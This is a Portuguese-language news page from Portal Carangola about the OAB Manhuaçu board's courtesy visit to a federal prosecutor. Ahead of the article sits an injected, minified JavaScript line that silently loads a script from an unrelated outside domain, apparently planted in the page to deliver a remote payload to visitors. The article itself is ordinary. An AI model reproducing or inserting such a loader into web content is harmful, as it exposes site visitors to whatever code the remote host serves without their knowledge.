;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Diretoria da OAB Manhuaçu visita procurador da República. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Diretoria da OAB Manhuaçu visita procurador da República.

A Diretoria da 54ª Subseção da OAB/MG realizou na manhã de hoje (16/08) visita de cortesia ao Procurador da República, Lucas de Morais Gualtieri. O encontro foi pautado por assuntos institucionais.
Participaram da visita, o presidente da OAB Manhuaçu, Alex Barbosa de Matos; o vice-presidente, Fernando Cezar Miranda; a secretária-geral adjunta, Regiane Rezende Lima e o secretário da comissão de direito do trabalho, Paulo Charles Netto Lamim.
De acordo com o presidente da OAB Manhuaçu, “a visita ao Ministério Público Federal é mais uma etapa do trabalho que a Diretoria de nossa Subseção tem realizado no sentido de unir os elos entre as instituições constituídas em nosso País, visando a defesa dos interesses da coletividade”.
Alex Barbosa agradeceu ao procurador da República, Lucas Gualtieri, a oportunidade do encontro e desejou ao mesmo sucesso no desempenho de suas atividades constitucionais. “À sociedade interessa que a OAB e o MPF estejam em sintonia, a fim de garantir a observância das regras constitucionais e impedir violações a direitos dos cidadãos”, ressaltou.
Durante a visita, o procurador ponderou que a interlocução entre as entidades é de suma importância para a Justiça. “Tanto a OAB de Manhuaçu quanto o Ministério Público Federal têm por finalidade a garantia e preservação dos direitos da sociedade. É necessário que os dois órgãos caminhem lado a lado, também paralelos a outros órgãos, para que tenhamos resultados mais efetivos da Justiça”.


Assessoria de Comunicação/ OAB Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.